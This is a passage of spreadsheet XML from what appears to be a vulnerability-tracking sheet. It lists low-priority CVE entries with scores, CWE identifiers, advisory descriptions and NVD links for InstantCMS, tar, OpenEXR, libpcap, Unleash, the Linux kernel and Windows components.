          <t>CWE-434, CWE-94</t>
        </is>
      </c>
      <c r="L4608" s="5" t="inlineStr">
        <is>
          <t>InstantCMS is a free and open source content management system. Versions prior to 2.18.2 have a Remote Code Execution (RCE) issue that allows remote authenticated attackers to execute any PHP code via the component installer. It is possible to upload a malicious component into the server, however, it won't be installed, but upload files will be executed. Normally all php files in upload folder are not executed, however, by uploading custom .htaccess it becomes possible. Version 2.18.2 contains a fix.</t>
        </is>
      </c>
      <c r="M4608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54611</t>
        </is>
      </c>
    </row>
    <row r="4609">
      <c r="A4609" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5704</t>
        </is>
      </c>
      <c r="C4609" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4609" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4609" s="5" t="inlineStr"/>
      <c r="F4609" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4609" s="5" t="inlineStr"/>
      <c r="H4609" s="5" t="inlineStr">
        <is>
          <t>gnu:tar, redhat:enterprise_linux, redhat:hardened_images</t>
        </is>
      </c>
      <c r="I4609" s="5" t="inlineStr">
        <is>
          <t>2026-04-06</t>
        </is>
      </c>
      <c r="J4609" s="5" t="inlineStr"/>
      <c r="K4609" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L4609" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in tar. A remote attacker could exploit this vulnerability by crafting a malicious archive, leading to hidden file injection with fully attacker-controlled content. This bypasses pre-extraction inspection mechanisms, potentially allowing an attacker to introduce malicious files onto a system without detection.</t>
        </is>
      </c>
      <c r="M4609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5704</t>
        </is>
      </c>
    </row>
    <row r="4610">
      <c r="A4610" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59183</t>
        </is>
      </c>
      <c r="C4610" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4610" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4610" s="5" t="inlineStr"/>
      <c r="F4610" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4610" s="5" t="inlineStr"/>
      <c r="H4610" s="5" t="inlineStr"/>
      <c r="I4610" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J4610" s="5" t="inlineStr"/>
      <c r="K4610" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L4610" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. In versions 3.1.0 through 3.2.10, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13, an int32_t multiplication in OpenEXRCore's unpack_sample_table() can overflow while decoding a crafted deep tiled EXR file, producing an invalid pointer that leads to a read from an unmapped memory address and a crash. Because the overflow occurs in the standard decoding path (exr_decoding_run), any application that decodes deep tiled EXR files is affected. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="M4610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59183</t>
        </is>
      </c>
    </row>
    <row r="4611">
      <c r="A4611" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59983</t>
        </is>
      </c>
      <c r="C4611" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4611" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4611" s="5" t="inlineStr"/>
      <c r="F4611" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4611" s="5" t="inlineStr"/>
      <c r="H4611" s="5" t="inlineStr"/>
      <c r="I4611" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J4611" s="5" t="inlineStr"/>
      <c r="K4611" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4611" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. OpenEXR versions before 3.2.11, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13 are vulnerable on ILP32 builds to an out-of-bounds read. The vulnerability is reached when a crafted uncompressed deep-tile EXR causes the sample-count table size calculation in OpenEXRCore decoding.c to wrap before unpack_sample_table() iterates over the full attacker-controlled tile dimensions, allowing denial of service. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="M4611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59983</t>
        </is>
      </c>
    </row>
    <row r="4612">
      <c r="A4612" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59984</t>
        </is>
      </c>
      <c r="C4612" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4612" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4612" s="5" t="inlineStr"/>
      <c r="F4612" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4612" s="5" t="inlineStr"/>
      <c r="H4612" s="5" t="inlineStr"/>
      <c r="I4612" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J4612" s="5" t="inlineStr"/>
      <c r="K4612" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L4612" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. OpenEXR versions 3.1.0 through 3.2.10, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13 are vulnerable on ILP32 builds to an out-of-bounds write. When a crafted B44-compressed scanline EXR causes the logical scratch size to truncate before allocation and uncompress_b44_impl() writes using the attacker-controlled channel width, allowing denial of service and memory corruption. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="M4612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59984</t>
        </is>
      </c>
    </row>
    <row r="4613">
      <c r="A4613" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59985</t>
        </is>
      </c>
      <c r="C4613" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4613" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4613" s="5" t="inlineStr"/>
      <c r="F4613" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4613" s="5" t="inlineStr"/>
      <c r="H4613" s="5" t="inlineStr"/>
      <c r="I4613" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J4613" s="5" t="inlineStr"/>
      <c r="K4613" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4613" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. OpenEXR versions 3.2.0 through 3.2.10, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13 are vulnerable on ILP32 builds to a heap out-of-bounds read. The issue occurs when a crafted RLE-compressed EXR causes the 64-bit unpacked size to truncate before allocation in OpenEXRCore decoding.c and unpack_32bit() reads beyond the resulting buffer, allowing denial of service. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="M4613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59985</t>
        </is>
      </c>
    </row>
    <row r="4614">
      <c r="A4614" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61555</t>
        </is>
      </c>
      <c r="C4614" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4614" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4614" s="5" t="inlineStr"/>
      <c r="F4614" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4614" s="5" t="inlineStr"/>
      <c r="H4614" s="5" t="inlineStr"/>
      <c r="I4614" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J4614" s="5" t="inlineStr"/>
      <c r="K4614" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4614" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. OpenEXR versions before 3.2.11, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13 are vulnerable to crashing. This occurs when Imf::GetChannelsInMultiPartFile() processes a crafted EXR with an empty multiView header attribute and Imf::viewFromChannelName() indexes the empty vector for a dotless channel name. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="M4614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61555</t>
        </is>
      </c>
    </row>
    <row r="4615">
      <c r="A4615" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6244</t>
        </is>
      </c>
      <c r="C4615" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4615" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4615" s="5" t="inlineStr"/>
      <c r="F4615" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4615" s="5" t="inlineStr"/>
      <c r="H4615" s="5" t="inlineStr"/>
      <c r="I4615" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J4615" s="5" t="inlineStr"/>
      <c r="K4615" s="5" t="inlineStr">
        <is>
          <t>CWE-369</t>
        </is>
      </c>
      <c r="L4615" s="5" t="inlineStr">
        <is>
          <t>libpcap BPF interpreter for the 'div #k' and 'mod #k' ALU instructions does not check whether the immediate value is zero.  In particular uncommon use cases a crafted filter program can cause a division by zero.</t>
        </is>
      </c>
      <c r="M4615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6244</t>
        </is>
      </c>
    </row>
    <row r="4616">
      <c r="A4616" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63004</t>
        </is>
      </c>
      <c r="C4616" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4616" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4616" s="5" t="inlineStr"/>
      <c r="F4616" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4616" s="5" t="inlineStr">
        <is>
          <t>microsoft, oracle</t>
        </is>
      </c>
      <c r="H4616" s="5" t="inlineStr"/>
      <c r="I4616" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J4616" s="5" t="inlineStr"/>
      <c r="K4616" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4616" s="5" t="inlineStr">
        <is>
          <t>Unleash is an open-source feature management platform. Prior to 7.5.2, 7.6.5, and 8.0.2, the addon and integration subsystem passes the operator-controlled parameters.url value from src/lib/addons/webhook.ts and the Slack, Microsoft Teams, Datadog, and New Relic integrations to Addon.fetchRetry in src/lib/addons/addon.ts without restricting loopback, link-local, private, or cloud metadata addresses. An authenticated actor with the root CREATE_ADDON or UPDATE_ADDON permission can cause the server to send requests from inside its network boundary, use integration event status as a blind probing oracle, forward Authorization, customHeaders, or DD-API-KEY values to an attacker-observed host, and deliver the feature-event JSON body to internal services. This issue is fixed in versions 7.5.2, 7.6.5, and 8.0.2.</t>
        </is>
      </c>
      <c r="M4616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63004</t>
        </is>
      </c>
    </row>
    <row r="4617">
      <c r="A4617" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64369</t>
        </is>
      </c>
      <c r="C4617" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4617" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4617" s="5" t="inlineStr"/>
      <c r="F4617" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4617" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H4617" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I4617" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J4617" s="5" t="inlineStr"/>
      <c r="K4617" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="L4617" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390: Revert support for DCACHE_WORD_ACCESS
load_unaligned_zeropad() reads eight bytes from unaligned addresses and may
cross page boundaries. It handles exceptions which may happen if reading
from the second page results in an exception.
For pages which are donated to the Ultravisor for secure execution purposes
the do_secure_storage_access() exception handler however does not handle
such exceptions correctly. Such an exception may result in an endless
exception loop which will never be resolved.
An attempt to fix this [1] turned out to be not sufficient. For now revert
load_unaligned_zeropad() until this problem has been resolved in a proper
way.
Note that the implementation of load_unaligned_zeropad() itself is
correct. The revert is just a temporary workaround until there is complete
fix for secure storage access exceptions.
[1] commit b00be77302d7 ("s390/mm: Add missing secure storage access fixups for donated memory")</t>
        </is>
      </c>
      <c r="M4617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64369</t>
        </is>
      </c>
    </row>
    <row r="4618">
      <c r="A4618" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64370</t>
        </is>
      </c>
      <c r="C4618" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4618" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4618" s="5" t="inlineStr"/>
      <c r="F4618" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4618" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H4618" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I4618" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J4618" s="5" t="inlineStr"/>
      <c r="K4618" s="5" t="inlineStr"/>
      <c r="L4618" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
posix-cpu-timers: Fix pid refcount leak in do_cpu_nanosleep() error path
In do_cpu_nanosleep(), posix_cpu_timer_create() takes a pid reference
via get_pid() and stores it in timer.it.cpu.pid. If the subsequent
posix_cpu_timer_set() call fails, the function returns immediately
without calling posix_cpu_timer_del() to release the pid reference,
causing a leak.
Fix it by calling posix_cpu_timer_del() before the unlock-and-return
on the error path, consistent with the other exit paths in the same
function.</t>
        </is>
      </c>
      <c r="M4618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64370</t>
        </is>
      </c>
    </row>
    <row r="4619">
      <c r="A4619" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64371</t>
        </is>
      </c>
      <c r="C4619" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4619" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4619" s="5" t="inlineStr"/>
      <c r="F4619" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4619" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H4619" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I4619" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J4619" s="5" t="inlineStr"/>
      <c r="K4619" s="5" t="inlineStr"/>
      <c r="L4619" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
proc: protect ptrace_may_access() with exec_update_lock (part 1)
Fix the easy cases where procfs currently calls ptrace_may_access() without
exec_update_lock protection, where the fix is to simply add the extra lock
or use mm_access():
 - do_task_stat(): grab exec_update_lock
 - proc_pid_wchan(): grab exec_update_lock
 - proc_map_files_lookup(): use mm_access() instead of get_task_mm()
 - proc_map_files_readdir(): use mm_access() instead of get_task_mm()
 - proc_ns_get_link(): grab exec_update_lock
 - proc_ns_readlink(): grab exec_update_lock</t>
        </is>
      </c>
      <c r="M4619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64371</t>
        </is>
      </c>
    </row>
    <row r="4620">
      <c r="A4620" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64376</t>
        </is>
      </c>
      <c r="C4620" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4620" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4620" s="5" t="inlineStr"/>
      <c r="F4620" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4620" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H4620" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I4620" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J4620" s="5" t="inlineStr"/>
      <c r="K4620" s="5" t="inlineStr"/>
      <c r="L4620" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware_loader: fix device reference leak in firmware_upload_register()
firmware_upload_register()
  -&gt; fw_create_instance()
     -&gt; device_initialize()
After fw_create_instance() succeeds, the lifetime of the embedded struct
device is expected to be managed through the device core reference
counting, since fw_create_instance() has already called
device_initialize().
In firmware_upload_register(), if alloc_lookup_fw_priv() fails after
fw_create_instance() succeeds, the code reaches free_fw_sysfs and frees
fw_sysfs directly instead of releasing the device reference with
put_device(). This may leave the reference count of the embedded struct
device unbalanced, resulting in a refcount leak.
The issue was identified by a static analysis tool I developed and
confirmed by manual review. Fix this by using put_device(fw_dev) in the
failure path and letting fw_dev_release() handle the final cleanup,
instead of freeing the instance directly from the error path.</t>
        </is>
      </c>
      <c r="M4620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64376</t>
        </is>
      </c>
    </row>
    <row r="4621">
      <c r="A4621" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6554</t>
        </is>
      </c>
      <c r="C4621" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4621" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4621" s="5" t="inlineStr"/>
      <c r="F4621" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4621" s="5" t="inlineStr"/>
      <c r="H4621" s="5" t="inlineStr"/>
      <c r="I4621" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J4621" s="5" t="inlineStr"/>
      <c r="K4621" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="L4621" s="5" t="inlineStr">
        <is>
          <t>libpcap BPF interpreter treats the offset in the 'ja L' BPF instruction as a signed integer to implement looping via backward jumps, but it does not limit the number of loop iterations.  In particular uncommon use cases a crafted filter program can cause the interpreter to loop infinitely.</t>
        </is>
      </c>
      <c r="M4621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6554</t>
        </is>
      </c>
    </row>
    <row r="4622">
      <c r="A4622" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68514</t>
        </is>
      </c>
      <c r="C4622" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4622" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4622" s="5" t="inlineStr"/>
      <c r="F4622" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4622" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H4622" s="5" t="inlineStr"/>
      <c r="I4622" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J4622" s="5" t="inlineStr"/>
      <c r="K4622" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L4622" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image file format, widely used in the motion picture industry. In versions 3.3.0 through 3.3.12 and 3.4.0 through 3.4.13, the PyOpenEXR Python bindings contain a heap out-of-bounds write triggered when reading a crafted deep scanline EXR file. When a deep file declares a literal channel named left alongside layer-prefixed RGB channels left.R, left.G, and left.B, the wrapper processes the literal left channel first and allocates a scalar deep sample array for it, then reuses that same array as the coalesced destination for the prefixed RGB group. The deep reader registers sample slices with an RGB stride (three lanes) into storage that was allocated with scalar shape, so decoding the deep samples writes past the allocation. Opening such a file through the default public Python API, OpenEXR.File(path), causes a heap buffer overflow during normal deep sample decode, leading to memory corruption and a crash. This issue is fixed in versions 3.3.13 and 3.4.14.</t>
        </is>
      </c>
      <c r="M4622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68514</t>
        </is>
      </c>
    </row>
    <row r="4623">
      <c r="A4623" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68830</t>
        </is>
      </c>
      <c r="C4623" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4623" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4623" s="5" t="inlineStr"/>
      <c r="F4623" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4623" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4623" s="5" t="inlineStr"/>
      <c r="I4623" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4623" s="5" t="inlineStr"/>
      <c r="K4623" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-59</t>
        </is>
      </c>
      <c r="L4623" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68830</t>
        </is>
      </c>
    </row>
    <row r="4624">
      <c r="A4624" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68831</t>
        </is>
      </c>
      <c r="C4624" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4624" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4624" s="5" t="inlineStr"/>
      <c r="F4624" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4624" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4624" s="5" t="inlineStr"/>
      <c r="I4624" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4624" s="5" t="inlineStr"/>
      <c r="K4624" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="L4624" s="5" t="inlineStr">
        <is>
          <t>Files or directories accessible to external parties in Windows Defender Firewall Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68831</t>
        </is>
      </c>
    </row>
    <row r="4625">
      <c r="A4625" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68842</t>
        </is>
      </c>
      <c r="C4625" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4625" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4625" s="5" t="inlineStr"/>
      <c r="F4625" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4625" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4625" s="5" t="inlineStr"/>
      <c r="I4625" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4625" s="5" t="inlineStr"/>
      <c r="K4625" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L4625" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows MIDI Service Module allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68842</t>
        </is>
      </c>
    </row>
    <row r="4626">
      <c r="A4626" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68843</t>
        </is>
      </c>
      <c r="C4626" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4626" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4626" s="5" t="inlineStr"/>
      <c r="F4626" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4626" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4626" s="5" t="inlineStr"/>
      <c r="I4626" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4626" s="5" t="inlineStr"/>
      <c r="K4626" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L4626" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Word allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68843</t>
        </is>
      </c>
    </row>
    <row r="4627">
      <c r="A4627" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68851</t>
        </is>
      </c>
      <c r="C4627" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4627" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4627" s="5" t="inlineStr"/>
      <c r="F4627" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4627" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4627" s="5" t="inlineStr"/>
      <c r="I4627" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4627" s="5" t="inlineStr"/>
      <c r="K4627" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L4627" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows NTFS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68851</t>
        </is>
      </c>
    </row>
    <row r="4628">
      <c r="A4628" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68852</t>
        </is>
      </c>
      <c r="C4628" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4628" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4628" s="5" t="inlineStr"/>
